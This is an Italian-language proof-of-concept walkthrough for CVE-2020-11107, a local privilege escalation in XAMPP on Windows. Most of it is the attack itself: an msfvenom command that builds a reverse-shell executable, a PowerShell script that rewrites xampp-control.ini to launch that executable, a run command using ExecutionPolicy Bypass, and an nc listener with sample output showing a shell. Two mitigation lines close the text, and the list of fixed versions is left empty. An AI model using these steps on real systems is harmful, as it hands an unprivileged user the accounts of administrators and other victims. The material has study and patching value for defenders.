
CVE-2020-11107-Local-Privilege-Escalation-XAMPP-7.2.29-7.3.x-7.3.16-7.4.x-7.4.4
CVE-2020-11107 è una vulnerabilità di Escalation dei privilegi locale (LPE) che colpisce Apache Friends XAMPP su Windows.
Un utente senza privilegi può modificare il file di configurazione del Pannello di controllo XAMPP (xampp-control.ini) e sostituire l'eseguibile dell'editor predefinito (notepad.exe) con un eseguibile dannoso.
Quando un altro utente (ad es. Amministratore) apre i log tramite il Pannello di controllo, il binario malevolo viene eseguito con i privilegi della vittima, con conseguente escalation dei privilegi.
❗ Questa vulnerabilità NON colpisce Linux o macOS.
xampp-control.ini è scrivibile a livello globaleC:\xampp\xampp-control.ini
C:\xampp\xampp-control.exe
Verifica la versione di XAMPP:
type C:\xampp\properties.ini
Esempio di output:
base_stack_version=7.3.10-1
base_stack_platform=windows-x64
✅ La versione è vulnerabile.
msfvenom -p windows/x64/shell_reverse_tcp \
LHOST=192.168.xxx.xxx LPORT=4444 \
-f exe -o msf.exe
mkdir C:\temp
# Carica msf.exe in C:\temp
Script di sfruttamento (PowerShell):
# CVE-2020-11107 PoC
$file = "C:\xampp\xampp-control.ini"
$find = ((Get-Content $file)[2] -Split "=")[1]
$replace = "C:\temp\msf.exe"
(Get-Content $file) -replace $find, $replace | Set-Content $file
Esegui lo script:
powershell -ExecutionPolicy Bypass -File 50337.ps1
La vittima avvia:
C:\xampp\xampp-control.exe
Poi apre un qualsiasi file di log dal Pannello di controllo.
nc -lvnp 4444
✅ Risultato:
Connection received...
C:\WINDOWS\system32>
🎉 Escalation dei privilegi riuscita
Aggiorna XAMPP a una delle seguenti versioni (o successive):
Limita i permessi su:
C:\xampp\xampp-control.ini